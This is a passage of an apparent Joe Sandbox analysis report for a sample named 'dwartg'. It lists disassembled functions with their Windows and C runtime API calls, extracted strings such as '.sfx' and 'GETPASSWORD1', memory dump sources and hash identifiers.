                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: Us$ps$zs
                                                                                              • API String ID: 176396367-29227579
                                                                                              • Opcode ID: 20a5a710893f9edbdbb007f8eb2b1a66ed014212277e46ea1890a5f1458b2d1e
                                                                                              • Instruction ID: 7fa81c96801606b420cf1262a3342edcff88140508646429081132755a28d634
                                                                                              • Opcode Fuzzy Hash: 20a5a710893f9edbdbb007f8eb2b1a66ed014212277e46ea1890a5f1458b2d1e
                                                                                              • Instruction Fuzzy Hash: 3641C271A00669DBDB219F689C0A9EF7BB8EF00310F004029F946E7245DB38AE458BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00722210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00722536
                                                                                                • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                                • Part of subcall function 007305DA: _wcslen.LIBCMT ref: 007305E0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: ;%u$x%u$xc%u
                                                                                              • API String ID: 3053425827-2277559157
                                                                                              • Opcode ID: c7a4bca8880fb59bf1712c684d68a0acca1a897b2d17a06c8de5a9c281f56a57
                                                                                              • Instruction ID: 0a0a6aadf7980718e3b7b8ae622b68be9aeefc6ad1e12c60609e9cda79f15c9d
                                                                                              • Opcode Fuzzy Hash: c7a4bca8880fb59bf1712c684d68a0acca1a897b2d17a06c8de5a9c281f56a57
                                                                                              • Instruction Fuzzy Hash: 4DF14A71604360EBDB25EF24A499BFE77996F90300F08056DFD869B283DB6CC946C762
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00742900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00742937
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0074293F
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 007429C8
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 007429F3
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00742A48
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: 06462bb893644e91f1094b01d7c390c85d0148c07e44a90d8f8426a4388c091b
                                                                                              • Instruction ID: 7e608614f62e5a33cc000b61328f9f9edaf4d7a6a77add79381f1cddc120a424
                                                                                              • Opcode Fuzzy Hash: 06462bb893644e91f1094b01d7c390c85d0148c07e44a90d8f8426a4388c091b
                                                                                              • Instruction Fuzzy Hash: 9D41A634A00208EFCF10DF68C885A9E7BB5AF45324F54C155FC19AB393D779AA26CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00739955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                              • API String ID: 176396367-3743748572
                                                                                              • Opcode ID: 981f83c64f4735236670df370d33de393fd5e392a9f27ec543e13582c690cb2a
                                                                                              • Instruction ID: 8191ec3f4aedca0c52c6340bad3e928070f545265447f5a5e6261aa708864654
                                                                                              • Opcode Fuzzy Hash: 981f83c64f4735236670df370d33de393fd5e392a9f27ec543e13582c690cb2a
                                                                                              • Instruction Fuzzy Hash: 3B315E7264434596FA30AB549C42B7A73E4EB90720F50C51EFA8647281FBEDAD84C3A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0074C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0074C868: _free.LIBCMT ref: 0074C891
                                                                                              • _free.LIBCMT ref: 0074C8F2
                                                                                                • Part of subcall function 00748DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?), ref: 00748DE2
                                                                                                • Part of subcall function 00748DCC: GetLastError.KERNEL32(?,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?,?), ref: 00748DF4
                                                                                              • _free.LIBCMT ref: 0074C8FD
                                                                                              • _free.LIBCMT ref: 0074C908
                                                                                              • _free.LIBCMT ref: 0074C95C
                                                                                              • _free.LIBCMT ref: 0074C967
                                                                                              • _free.LIBCMT ref: 0074C972
                                                                                              • _free.LIBCMT ref: 0074C97D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                              • Instruction ID: a63fb4b834cb868cc1fa71c29a04147911f3cdb715892f3edea46d4513544623
                                                                                              • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                              • Instruction Fuzzy Hash: E2111271A8270CE6E5A1B771CC0FFCB7BAC9F04B00F404C15B29D66092DB69B5058B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00748900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 0074891E
                                                                                                • Part of subcall function 00748DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?), ref: 00748DE2
                                                                                                • Part of subcall function 00748DCC: GetLastError.KERNEL32(?,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?,?), ref: 00748DF4
                                                                                              • _free.LIBCMT ref: 00748930
                                                                                              • _free.LIBCMT ref: 00748943
                                                                                              • _free.LIBCMT ref: 00748954
                                                                                              • _free.LIBCMT ref: 00748965
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID: pu
                                                                                              • API String ID: 776569668-250260183
                                                                                              • Opcode ID: 2960301863999a219f5d9d61578cffb99fe290ff3cfcb903f5ec30ca11127ad2
                                                                                              • Instruction ID: cf02ad04314a453d07231639c371a063adbaeca253214bc9a17777f2743c044d
                                                                                              • Opcode Fuzzy Hash: 2960301863999a219f5d9d61578cffb99fe290ff3cfcb903f5ec30ca11127ad2
                                                                                              • Instruction Fuzzy Hash: 0DF03071A5121ACB86866F14FC0644D3BA1F7287223128505F414932B3DF7E4A529FCA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073A80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0073A699: GetDC.USER32(00000000), ref: 0073A69D
                                                                                                • Part of subcall function 0073A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0073A6A8
                                                                                                • Part of subcall function 0073A699: ReleaseDC.USER32(00000000,00000000), ref: 0073A6B3
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 0073A83C
                                                                                                • Part of subcall function 0073AAC9: GetDC.USER32(00000000), ref: 0073AAD2
                                                                                                • Part of subcall function 0073AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0073AB01
                                                                                                • Part of subcall function 0073AAC9: ReleaseDC.USER32(00000000,?), ref: 0073AB99
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectRelease$CapsDevice
                                                                                              • String ID: "s$($As
                                                                                              • API String ID: 1061551593-951805127
                                                                                              • Opcode ID: c086b914c0ba545002e731aff767ba610c4eccd546e125b7cc833465b0f4e292
                                                                                              • Instruction ID: 6c5758b691f93ab1e0cf860a829ac206e820a946957ead690f1bf30e0ad4c46a
                                                                                              • Opcode Fuzzy Hash: c086b914c0ba545002e731aff767ba610c4eccd546e125b7cc833465b0f4e292
                                                                                              • Instruction Fuzzy Hash: 60910271208744AFE711DF25C845A6BBBE9FFC8701F00891EF59AD3221DB74A945CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0072C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 007305DA: _wcslen.LIBCMT ref: 007305E0
                                                                                                • Part of subcall function 0072B92D: _wcsrchr.LIBVCRUNTIME ref: 0072B944
                                                                                              • _wcslen.LIBCMT ref: 0072C197
                                                                                              • _wcslen.LIBCMT ref: 0072C1DF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$_wcsrchr
                                                                                              • String ID: .exe$.rar$.sfx
                                                                                              • API String ID: 3513545583-31770016
                                                                                              • Opcode ID: b7786cbd79d0a3aca26cde56d9ff391be58f2f546f6ad2adf4f9f0f3114093b1
                                                                                              • Instruction ID: ca86f43ce5b4a889c75ace76f09141be1251c6c70133f6cbe4cafb05679f7eb6
                                                                                              • Opcode Fuzzy Hash: b7786cbd79d0a3aca26cde56d9ff391be58f2f546f6ad2adf4f9f0f3114093b1
                                                                                              • Instruction Fuzzy Hash: E4417962100375D6D733AF34A856A7E73A8EF61744F20050EF8C26B082EB6D5E91C391
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0072B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 0072B9B8
                                                                                                • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                              • _wcschr.LIBVCRUNTIME ref: 0072B9D6
                                                                                              • _wcschr.LIBVCRUNTIME ref: 0072B9E6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                              • String ID: %c:\
                                                                                              • API String ID: 525462905-3142399695
                                                                                              • Opcode ID: 320310f4162e4fb28d337e9b505fb1f958e0043c21c931165a166ccc1df27727
                                                                                              • Instruction ID: 7d393790a781042ce427cdd60dfa83bf6d40e299a3237ca2e9b88bdcdfbdc07f
                                                                                              • Opcode Fuzzy Hash: 320310f4162e4fb28d337e9b505fb1f958e0043c21c931165a166ccc1df27727
                                                                                              • Instruction Fuzzy Hash: 1D01F563514321A99A306B35AC4AD6BB7ACEE95770B50840AF584D6082FB28F89483B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0073B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00721316: GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                                • Part of subcall function 00721316: SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                              • EndDialog.USER32(?,00000001), ref: 0073B2BE
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0073B2D6
                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 0073B304
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: GETPASSWORD1$xzw
                                                                                              • API String ID: 445417207-3717932900
                                                                                              • Opcode ID: b5aa76b9f5837434c5c96ec38d027e68530d2fbdae7f612e3bd3d8928b0e83cc
                                                                                              • Instruction ID: bada34eedb97f84da631fd3d5222949dfdde776cfc7202a5978394aac8ee8fa6
                                                                                              • Opcode Fuzzy Hash: b5aa76b9f5837434c5c96ec38d027e68530d2fbdae7f612e3bd3d8928b0e83cc
                                                                                              • Instruction Fuzzy Hash: 7011C432940128B6EB219A78AC49FFF376DFF19B40F104120FB46B61C1C7ACAA4597A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00749869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,?,007491AD,0074B188,?,00749813,00000001,00000364,?,00743F73,00000050,?,00761030,00000200), ref: 0074986E
                                                                                              • _free.LIBCMT ref: 007498A3
                                                                                              • _free.LIBCMT ref: 007498CA
                                                                                              • SetLastError.KERNEL32(00000000,?,00761030,00000200), ref: 007498D7
                                                                                              • SetLastError.KERNEL32(00000000,?,00761030,00000200), ref: 007498E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              • Opcode ID: 8f9b1dc68df639f3ebe478ac213254b1fa9743822ac8c8d8c8eb032f3d59effd
                                                                                              • Instruction ID: cee4d5d51215897ab04ece455e3510353aca04d976ab76d2c292202c220d4297
                                                                                              • Opcode Fuzzy Hash: 8f9b1dc68df639f3ebe478ac213254b1fa9743822ac8c8d8c8eb032f3d59effd
                                                                                              • Instruction Fuzzy Hash: 6C01F436285705ABC312676C6C8D96B252EDBD27B27210234F625961A2EF6C8D025269
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 007431D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 007431FB
                                                                                              • _abort.LIBCMT ref: 00743306
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: EncodePointer_abort
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 948111806-2084237596
                                                                                              • Opcode ID: d5face028c07b41d50a9fc02bdc25dc70bfb0e193bece27c6adafab57b5f41a6
                                                                                              • Instruction ID: cb9d8e94a856b29b134e807ea031e5476bb86cceb0631f874f48a8091061731c
                                                                                              • Opcode Fuzzy Hash: d5face028c07b41d50a9fc02bdc25dc70bfb0e193bece27c6adafab57b5f41a6
                                                                                              • Instruction Fuzzy Hash: 9F414871900209EFDF15DF98CD82AEEBBB5BF48304F188159F908A7226D379AA51DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0072D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __fprintf_l.LIBCMT ref: 0072D954
                                                                                              • _strncpy.LIBCMT ref: 0072D99A
                                                                                                • Part of subcall function 00731DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00761030,00000200,0072D928,00000000,?,00000050,00761030), ref: 00731DC4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                              • String ID: $%s$@%s
                                                                                              • API String ID: 562999700-834177443
                                                                                              • Opcode ID: 385157331881866287f1723ab75f3f4c01b85e87f4e439809837cd66eddb367f
                                                                                              • Instruction ID: 32a3c694422b8237202525c493174bbbe71e4d93ccebe7be3e681bc10ebb04c3
                                                                                              • Opcode Fuzzy Hash: 385157331881866287f1723ab75f3f4c01b85e87f4e439809837cd66eddb367f
                                                                                              • Instruction Fuzzy Hash: E621907244025CEAEB31EEA4DC05FDE7BA8EF05300F044126F990961A2E779EA988B51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0072124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: Malloc
                                                                                              • String ID: (s$2s$A
                                                                                              • API String ID: 2696272793-3699640820
                                                                                              • Opcode ID: 79b28cf346e344f66fb151995496e40c840d158a6cb1ea9784dd44b7bdbf5c37
